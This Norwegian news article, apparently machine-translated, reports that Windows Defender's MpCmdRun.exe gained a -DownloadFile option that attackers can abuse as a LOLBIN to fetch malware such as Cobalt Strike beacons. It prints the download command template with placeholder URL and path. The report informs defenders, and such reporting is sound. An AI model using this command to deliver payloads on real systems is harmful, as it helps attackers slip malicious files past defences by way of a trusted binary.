Windows Defender blir til en farlig app for administratorer

How to effectively deal with bots on your site? The best protection against click fraud.
  • Windows Forsvarer i Windows 10 er et flott verktøy for å forsvare systemet ditt, men en ny oppdatering gjorde det til en trussel.
  • En ny DownloadFile kommandoen kan brukes til å laste ned hvilken som helst ekstern fil, inkludert skadelig programvare på datamaskinen din.
  • Utforsk vår Programvare seksjon for de beste artiklene om de nyeste digitale verktøyene.
  • Hvis du er interessert i de nyeste Windows 10-artiklene, kan du gå til det omfattende Windows 10 Hub.
Windows Defender blir til en LOLBIN

Windows Defender i Windows 10 er den første forsvarslinjen i tilfelle skadelige angrep, og det gjør en ganske bra jobb også.

Imidlertid, i en av de nye oppdateringene, fikk det mektige antivirusprogrammet en ny DownloadFile-kommando, som gjør det mulig for alle å laste ned filer fra en URL til en bestemt bane på datamaskinen din.

Vi kan kalle dette en utnyttelse siden den også kan brukes til å laste ned skadelig programvare, noe som ble oppdaget av sikkerhetsforsker Mohammad Askar som postet hans funn på Twitter.

Hvordan kan Windows Defender brukes til å laste ned skadelig programvare?

instagram story viewer

Det er veldig enkelt å bruke Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) til å laste ned alle filer fra en ekstern kilde til datamaskinen din.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

I sitt forsøk, Askar klarte å laste ned Cobalt Strike fyrtårn, et kjent angriperverktøy ved hjelp av denne kommandolinjen.

Den nye kommandoen er inkludert i versjonen 4.18.2007.8-0 og oppover som gir en ganske god starttid for angripere.

I utgangspunktet snur denne funksjonen seg Windows Defender inn i en LOLBIN (som lever av binærfiler), en ufarlig systemfil som kan brukes til ondsinnede formål.

Heldigvis, etter at du har lastet ned den skadelige filen, blir den oppdaget av samme Windows Defender eller av en annen antivirus programvare hvis tilstede.

Fra en pålitelig beskyttelsesprogramvare ble Windows Defender til en annen mulig trussel som må overvåkes nøye av administratorer og sikkerhetseksperter.

Hvis du har noen forslag eller kommentarer, kan du legge dem nedenfor i kommentarfeltet.

Teachs.ru
La Pagina Web Potrebbe Essere Stata Spostata o Inattiva: Correzioni

La Pagina Web Potrebbe Essere Stata Spostata o Inattiva: CorrezioniMiscellanea

La pagina Web all'indirizzo -- potrebbe essere temporaneamente inattiva eller potrebbe essersi spostata in modo permanente su un nuovo indirizzo Web. Spørsmål om feilsøking kan bekrefte årsaken til...

Les mer
Xbox One ikke Trova eller Wi-Fi? Ecco Come Risolvere

Xbox One ikke Trova eller Wi-Fi? Ecco Come RisolvereMiscellanea

XINSTALLER VED Å KLIKKE LAST NED FILENEliminer gli feil i WindowsFortect è uno strumento di riparazione in grado di scansionare l'intero Sistema alle ricerca di file del sistema operativo danneggia...

Les mer
Kommer Mantenere Verde lo Stato su Teams? 5 Modi per Farlo

Kommer Mantenere Verde lo Stato su Teams? 5 Modi per FarloMiscellanea

Lo stato attivo di Microsoft Teams è rappresentato da un pallino verde che indica che sei disponibile e stai lavorando attivamente. Le impostazioni di visualizzazione come il timeout dello schermo ...

Les mer
ig stories viewer